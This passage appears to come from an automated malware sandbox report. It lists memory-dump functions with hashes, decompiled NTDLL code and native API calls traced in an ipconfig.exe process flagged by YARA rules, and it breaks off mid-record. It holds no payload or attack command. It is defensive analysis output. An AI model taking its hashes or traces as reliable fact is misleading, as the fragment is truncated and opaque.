Instruction ID: 51bcd9a756500c6057d12853fe9c37b71da0457c6bf8cc5838b5f349b305e208
Opcode Fuzzy Hash: 418b3b2532b22e06efb4829c0f2e252209ec6df138f3ecf74a0f37762900be81
Instruction Fuzzy Hash: 1990027520100447D100615A550C70B000557D0641FD2D521E0514518DD69A88517162

Uniqueness

Uniqueness Score: -1.00%

Function 1E3EA3B0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2927181966fcd70884b9420c9988307aa3f6725e01d400ba9b3f3e660786e13
Instruction ID: 6317e7a0186661fc28c57288c1fff6a823b14240e869cb197fb46bd729f9e580
Opcode Fuzzy Hash: b2927181966fcd70884b9420c9988307aa3f6725e01d400ba9b3f3e660786e13
Instruction Fuzzy Hash: CA90027520144046D140715A844C70F500567E0741FD2C521E0515514C86598856B262

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E9820, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31f7a35cd8e32e63c8f833fb847ca048c24fcdfe43d0d9211acf29bbeee0ab57
Instruction ID: 6b61d515eb8c011bd076f5c0d4c936656a8a2b85d77f26682c7213ba1f6ce2a9
Opcode Fuzzy Hash: 31f7a35cd8e32e63c8f833fb847ca048c24fcdfe43d0d9211acf29bbeee0ab57
Instruction Fuzzy Hash: 6290027524100446D141715A440C70A000967D0681FD2C122E0514514E86998A56BAA2

Uniqueness

Uniqueness Score: -1.00%

Function 1E3EB040, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06a0303a645c7cbf54bdf0d1f3945a5ac1049328a279e4cb234c8da5ae391d1c
Instruction ID: 7b25647b84a99f8621e8bd97b8e7cc6d5153198065bd4f48e4cd12aaff05778a
Opcode Fuzzy Hash: 06a0303a645c7cbf54bdf0d1f3945a5ac1049328a279e4cb234c8da5ae391d1c
Instruction Fuzzy Hash: 309002A5601140874540B15A480C50A501567E17413D2C231E0544520C86AC8855B2A6

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E98A0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51c3a1e3bd79f2ba65f933b189e210a02f7f39f1ed107579a12d923754d9b15b
Instruction ID: 3a817291a2474782efd49cd12a7ff5e5fd9d34d86026804e0212a1fe95e0993a
Opcode Fuzzy Hash: 51c3a1e3bd79f2ba65f933b189e210a02f7f39f1ed107579a12d923754d9b15b
Instruction Fuzzy Hash: 1390026530100446D102615A441C70A000997D1785FD2C122E1514515D86698953B173

Uniqueness

Uniqueness Score: -1.00%

Function 1E3EAD30, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 796ce994eee79ef22fd4041e8071a83392f4a9aea30557a0c522249e92a2cefc
Instruction ID: 1e8e8a42011f8dbe7f8e84ea572f4ced27397a0b4f73b6aacf9a67672796ed17
Opcode Fuzzy Hash: 796ce994eee79ef22fd4041e8071a83392f4a9aea30557a0c522249e92a2cefc
Instruction Fuzzy Hash: B5900275A05000569140715A481C74A400667E0B81BD6C121E0604514C89988A5573E2

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E9520, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f232f1f644bb2a3ae9f3a158140d9be7f51815c877b98cce9e1a4684becac6a6
Instruction ID: 80314198d08a6eaaa86c4629915c15f1abdecd56cb267fa5bdc4f89942494c1a
Opcode Fuzzy Hash: f232f1f644bb2a3ae9f3a158140d9be7f51815c877b98cce9e1a4684becac6a6
Instruction Fuzzy Hash: 3E9002E5201140D64500A25A840CB0E450557E0641BD2C126E1144520CC5698851B176

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E9560, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ff126b61c6472090809b5feabdf53229da2453a3f001d8266cde105857f311e
Instruction ID: cc660c9d38ebf6f4002213a6aa9cba5ea86e209830bd32a0716c1a7c7ed2c787
Opcode Fuzzy Hash: 8ff126b61c6472090809b5feabdf53229da2453a3f001d8266cde105857f311e
Instruction Fuzzy Hash: 32900269221000460145A55A060C60F044567D67913D2C125F1506550CC66588657362

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E9950, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bfc8e12ae1c727762e63b053498f165a08bb94d2c6a070a2e5d5337f4f2a520
Instruction ID: 48587bd35c1cdbfbdccc95a0fb0fb635ae9f5b050284ac29f80643d228c0241a
Opcode Fuzzy Hash: 5bfc8e12ae1c727762e63b053498f165a08bb94d2c6a070a2e5d5337f4f2a520
Instruction Fuzzy Hash: 309002A520140447D140655A480C70B000557D0742FD2C121E2154515E8A6D8C517176

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E95F0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 470d2999ba813b43f9c00de0c76f3c15562e983e0ec61624af85c6ed416fde6f
Instruction ID: 0d4d3d02dd4cb7870e8a48b894bcc912f23ec6620f5b1ad0c90e8a2608951cde
Opcode Fuzzy Hash: 470d2999ba813b43f9c00de0c76f3c15562e983e0ec61624af85c6ed416fde6f
Instruction Fuzzy Hash: 5B90027520100846D104615A480C78A000557D0741FD2C121E6114615E96A988917172

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E99D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a2c6fe2718465c31e612597e5782456cd9817a6c3b5c1431ba73240dd55824b
Instruction ID: 4533f75b9d2469954445ad6355c87bd1095c59160f5376c0c35ef12dc3d27e0d
Opcode Fuzzy Hash: 4a2c6fe2718465c31e612597e5782456cd9817a6c3b5c1431ba73240dd55824b
Instruction Fuzzy Hash: 849002A521100086D104615A440C70A004557E1641FD2C122E2244514CC56D8C617166

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E9670, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: b56d3f8e158b6001f27b46016bec54252deccf0fc7850e2c30eddaf8fbbdade7
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 1E3D645B, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109
timeCOMMON

Download Yara Rule

C-Code - Quality: 26%

			E1E3D645B(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v36;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr* _t52;
				char _t56;
				void* _t69;
				char _t72;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t79;
				void* _t82;
				void* _t84;
				intOrPtr _t86;
				void* _t88;
				signed int _t90;
				signed int _t92;
				signed int _t93;

				_t80 = __edx;
				_t92 = (_t90 & 0xfffffff8) - 0x4c;
				_v8 =  *0x1e49d360 ^ _t92;
				_t72 = 0;
				_v72 = __edx;
				_t82 = __ecx;
				_t86 =  *((intOrPtr*)(__edx + 0xc8));
				_v68 = _t86;
				E1E3EFA60( &_v60, 0, 0x30);
				_t48 =  *((intOrPtr*)(_t82 + 0x70));
				_t93 = _t92 + 0xc;
				_v76 = _t48;
				_t49 = _t48;
				if(_t49 == 0) {
					_push(5);
					 *((char*)(_t82 + 0x6a)) = 0;
					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
					goto L3;
				} else {
					_t69 = _t49 - 1;
					if(_t69 != 0) {
						if(_t69 == 1) {
							_push(0xa);
							goto L3;
						} else {
							_t56 = 0;
						}
					} else {
						_push(4);
						L3:
						_pop(_t50);
						_v80 = _t50;
						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
							E1E3C2280(_t50, _t86 + 0x1c);
							_t79 = _v72;
							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
							E1E3BFFB0(_t72, _t82, _t86 + 0x1c);
						}
						_t75 = _v80;
						_t52 =  *((intOrPtr*)(_v72 + 0x20));
						_t80 =  *_t52;
						_v72 =  *((intOrPtr*)(_t52 + 4));
						_v52 =  *((intOrPtr*)(_t82 + 0x68));
						_v60 = 0x30;
						_v56 = _t75;
						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
						asm("movsd");
						_v76 = _t80;
						_v64 = 0x30;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if(_t80 != 0) {
							 *0x1e49b1e0(_t75, _v72,  &_v64,  &_v60);
							_t72 = _v76();
						}
						_t56 = _t72;
					}
				}
				_pop(_t84);
				_pop(_t88);
				_pop(_t73);
				return E1E3EB640(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
			}

0x1e3d645b
0x1e3d6463
0x1e3d646d
0x1e3d6475
0x1e3d647a
0x1e3d647e
0x1e3d6480
0x1e3d648c
0x1e3d6490
0x1e3d6495
0x1e3d6498
0x1e3d649b
0x1e3d649f
0x1e3d64a1
0x1e417c07
0x1e417c09
0x1e417c0c
0x00000000
0x1e3d64a7
0x1e3d64a7
0x1e3d64aa
0x1e417bf7
0x1e417c00
0x00000000
0x1e417bf9
0x1e417bf9
0x1e417bf9
0x1e3d64b0
0x1e3d64b0
0x1e3d64b2
0x1e3d64b2
0x1e3d64b3
0x1e3d64ba
0x1e3d6553
0x1e3d655e
0x1e3d6566
0x1e3d656c
0x1e3d6575
0x1e3d657f
0x1e3d6585
0x1e3d6588
0x1e3d6588
0x1e3d64c7
0x1e3d64cb
0x1e3d64ce
0x1e3d64d3
0x1e3d64da
0x1e3d64e5
0x1e3d64ed
0x1e3d64f1
0x1e3d64f5
0x1e3d64f6
0x1e3d64fa
0x1e3d6502
0x1e3d6503
0x1e3d6504
0x1e3d6507
0x1e3d651a
0x1e3d6524
0x1e3d6524
0x1e3d6526
0x1e3d6526
0x1e3d64aa
0x1e3d652c
0x1e3d652d
0x1e3d652e
0x1e3d6539

APIs

RtlDebugPrintTimes.NTDLL ref: 1E3D651A

Strings

0, xrefs: 1E3D64FA
0, xrefs: 1E3D64E5

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: 0$0
API String ID: 3446177414-203156872
Opcode ID: 20bc853a84277132374955895b7c341da4cc5cafe673f5ac046e4063079f8400
Instruction ID: c6ce05866ed0a428c24516c3888f241f737f9b2715814094d67d7a417fdcff41
Opcode Fuzzy Hash: 20bc853a84277132374955895b7c341da4cc5cafe673f5ac046e4063079f8400
Instruction Fuzzy Hash: 52415BB26047469FC301CF28C484A1ABBE5BB8D714F454A6EF899DB301D731EA49CB96

Uniqueness

Uniqueness Score: -1.00%

Function 1E43FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E1E43FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E1E3ECE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E1E435720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E1E435720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x1e43fdda
0x1e43fde2
0x1e43fde5
0x1e43fdec
0x1e43fdfa
0x1e43fdff
0x1e43fe0a
0x1e43fe0f
0x1e43fe17
0x1e43fe1e
0x1e43fe19
0x1e43fe19
0x1e43fe19
0x1e43fe20
0x1e43fe21
0x1e43fe22
0x1e43fe25
0x1e43fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1E43FDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 1E43FE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 1E43FE01

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 8c4dd5c18a6f453816f1360b50a81c1f370b25123c3af78329026e1c4b690587
Instruction ID: d0965ee7a8980bc73e418a959f569537691f8a2ee80af317fb6936aed78332d2
Opcode Fuzzy Hash: 8c4dd5c18a6f453816f1360b50a81c1f370b25123c3af78329026e1c4b690587
Instruction Fuzzy Hash: 22F0F636500551BFDB200A45EC02F63BB5AEB88731F250316F668566E1DB62F86096F0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ipconfig.exe PID: 244 Parent PID: 3388 ipconfig.exeCOMMON

Executed Functions

Function 02DE81AA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02DE3B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02DE3B87,007A002E,00000000,00000060,00000000,00000000), ref: 02DE81FD

Strings

.z`, xrefs: 02DE81ED, 02DE81F8

Memory Dump Source

Source File: 00000013.00000002.495160513.0000000002DD0000.00000040.00000001.sdmp, Offset: 02DD0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 5a1705e5776c923de72a06ed432b1059e0e531adf605754642219ffbd0efdb3d
Instruction ID: 7ef00819427a4de2f8d93a6e7586374f364a576f2ca006b3fc4f4850dba6a478
Opcode Fuzzy Hash: 5a1705e5776c923de72a06ed432b1059e0e531adf605754642219ffbd0efdb3d
Instruction Fuzzy Hash: 5321C6B6210208AFCB18DF98DC95EEB77A9EF8C754F158248FA5D97251D630EC11CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02DE81B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02DE3B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02DE3B87,007A002E,00000000,00000060,00000000,00000000), ref: 02DE81FD

Strings

.z`, xrefs: 02DE81ED, 02DE81F8

Memory Dump Source

Source File: 00000013.00000002.495160513.0000000002DD0000.00000040.00000001.sdmp, Offset: 02DD0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: c6a98ad85076602c04a88945fcbd42bbf9b1559354436726044299487a64a249
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 05F0B2B2200208AFCB08DF88DC84EEB77ADAF8C754F158248BA0D97240C630EC118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 02DE825A, Relevance: 1.5, APIs: 1, Instructions: 37filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02DE3D42,5E972F59,FFFFFFFF,02DE3A01,?,?,02DE3D42,?,02DE3A01,FFFFFFFF,5E972F59,02DE3D42,?,00000000), ref: 02DE82A5

Memory Dump Source

Source File: 00000013.00000002.495160513.0000000002DD0000.00000040.00000001.sdmp, Offset: 02DD0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 762f30cdbe95d4427502bfa4d141b80e45f849fb91512fa18d4d3fe24360ce37
Instruction ID: c1f28cfec59d2096c7ed25d0f2a9524afa9145a9a40c178dc69700e0349e775c
Opcode Fuzzy Hash: 762f30cdbe95d4427502bfa4d141b80e45f849fb91512fa18d4d3fe24360ce37
Instruction Fuzzy Hash: 1CF097B2640109AFCB18DF99DC80DEB77A9EF8C354F158659BA1DD7251DA30E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02DE82DC, Relevance: 1.5, APIs: 1, Instructions: 36nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02DE3D20,?,?,02DE3D20,00000000,FFFFFFFF), ref: 02DE8305

Memory Dump Source

Source File: 00000013.00000002.495160513.0000000002DD0000.00000040.00000001.sdmp, Offset: 02DD0000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 4d9e81edfd8e9658eff56d334ad943a6ba96483481aece287e51048d7d9503d4
Instruction ID: f61bf8ccffd7c63a2235e3a382a5d70bb34542bf324d4525e18e323a17193195
Opcode Fuzzy Hash: 4d9e81edfd8e9658eff56d334ad943a6ba96483481aece287e51048d7d9503d4
Instruction Fuzzy Hash: E9F05EB6200114AFDB24EF98DC80EEB776DEF88350F108559BA58DB211C630E9158BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02DE8260, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02DE3D42,5E972F59,FFFFFFFF,02DE3A01,?,?,02DE3D42,?,02DE3A01,FFFFFFFF,5E972F59,02DE3D42,?,00000000), ref: 02DE82A5

Memory Dump Source

Source File: 00000013.00000002.495160513.0000000002DD0000.00000040.00000001.sdmp, Offset: 02DD0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 7b8199cbd44407d40619660f91ea721b02301958de6f0c51b6592f123488e797
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 92F0A4B2200208AFCB14DF89DC80EEB77ADEF8C754F158248BA1D97251DA30EC118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02DE82E0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02DE3D20,?,?,02DE3D20,00000000,FFFFFFFF), ref: 02DE8305

Memory Dump Source

Source File: 00000013.00000002.495160513.0000000002DD0000.00000040.00000001.sdmp, Offset: 02DD0000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: e14678a775175d2aa8fd042c0d4b0314e203d0f7ec8d56732527b7601d854784
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 19D012752002146BDB10EF98CC45ED7775DEF44760F154455BA199B341C530F90086E0

Uniqueness

Uniqueness Score: -1.00%

Function 03649A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03649A5A

Memory Dump Source

Source File: 00000013.00000002.496085095.00000000035E0000.00000040.00000001.sdmp, Offset: 035E0000, based on PE: true

Associated: 00000013.00000002.496592097.00000000036FB000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.496605344.00000000036FF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8bd582e4e19158083bbe62f6a54ff9a0b6074eb800f6aa90f65a2c78a78fab74
Instruction ID: 7552a58dda3785332a2bc63522fafd65d0f9cee7c0cff90081b5c187d4bd005b
Opcode Fuzzy Hash: 8bd582e4e19158083bbe62f6a54ff9a0b6074eb800f6aa90f65a2c78a78fab74
Instruction Fuzzy Hash: 3190026121184543D201A9694C15B070009D7D1343F51C125B4144558CCA5588A16561

Uniqueness

Uniqueness Score: -1.00%

Function 03649910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0364991A

Memory Dump Source

Source File: 00000013.00000002.496085095.00000000035E0000.00000040.00000001.sdmp, Offset: 035E0000, based on PE: true

Associated: 00000013.00000002.496592097.00000000036FB000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.496605344.00000000036FF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e8a3858987370c84eff8deba5d0957230f4f7a8d7db13deb1087275d1a23ef08
Instruction ID: f860de7e74abd83d1f6d3aa7584c82eca9526bd452433f654a835bd28a722df9
Opcode Fuzzy Hash: e8a3858987370c84eff8deba5d0957230f4f7a8d7db13deb1087275d1a23ef08
Instruction Fuzzy Hash: D09002B120104903D141B55944057460009D7D1341F51C021B9054558E87998DD576A5

Uniqueness

Uniqueness Score: -1.00%

Function 03649860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0364986A

Memory Dump Source

Source File: 00000013.00000002.496085095.00000000035E0000.00000040.00000001.sdmp, Offset: 035E0000, based on PE: true

Associated: 00000013.00000002.496592097.00000000036FB000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.496605344.00000000036FF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4f9656bc2ff4d6326b5f4997a08fb0e0e15c33457bee143940dc801e48802202
Instruction ID: 7c8156f79885ae65dc84e8e3c8200bbe12e06658b013adb08e60012082984743
Opcode Fuzzy Hash: 4f9656bc2ff4d6326b5f4997a08fb0e0e15c33457bee143940dc801e48802202
Instruction Fuzzy Hash: BF90027120104913D112A5594505707000DD7D1281F91C422B441455CD97968992B161

Uniqueness

Uniqueness Score: -1.00%

Function 03649FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03649FEA

Memory Dump Source

Source File: 00000013.00000002.496085095.00000000035E0000.00000040.00000001.sdmp, Offset: 035E0000, based on PE: true

Associated: 00000013.00000002.496592097.00000000036FB000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.496605344.00000000036FF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0e7af548bc2cc875bfde46ee2d63858780dc1d695eba34a7ec9aa58df6bb2827
Instruction ID: 651b20ba457cbeb21181704a17f248f6862be95501eb8c0dee818498acbff7a5
Opcode Fuzzy Hash: 0e7af548bc2cc875bfde46ee2d63858780dc1d695eba34a7ec9aa58df6bb2827
Instruction Fuzzy Hash: 5690027131118903D111A55984057060009D7D2241F51C421B481455CD87D588D17162

Uniqueness

Uniqueness Score: -1.00%

Function 036496E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 036496EA

Memory Dump Source

Source File: 00000013.00000002.496085095.00000000035E0000.00000040.00000001.sdmp, Offset: 035E0000, based on PE: true

Associated: 00000013.00000002.496592097.00000000036FB000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.496605344.00000000036FF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: aa8e08e5466488d72e92626db5ec348354c2b377fd4ff1dea978dbe63f051045
Instruction ID: 281f70ac648fdab58ff36069c6cef123cc063dd1f0073cc17d41782f5cfcbc01
Opcode Fuzzy Hash: aa8e08e5466488d72e92626db5ec348354c2b377fd4ff1dea978dbe63f051045
Instruction Fuzzy Hash: 5B9002712010CD03D111A559840574A0009D7D1341F55C421B841465CD87D588D17161

Uniqueness

Uniqueness Score: -1.00%

Function 03649540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0364954A

Memory Dump Source

Source File: 00000013.00000002.496085095.00000000035E0000.00000040.00000001.sdmp, Offset: 035E0000, based on PE: true

Associated: 00000013.00000002.496592097.00000000036FB000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.496605344.00000000036FF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 481f9fd79001dff5ad067413d368ef1eab9acbc1022293b595b65c1563509530
Instruction ID: cd9e218e0bfd0be7727fbebb897d21abbc68435f3ee7a2053210efceea0c9092
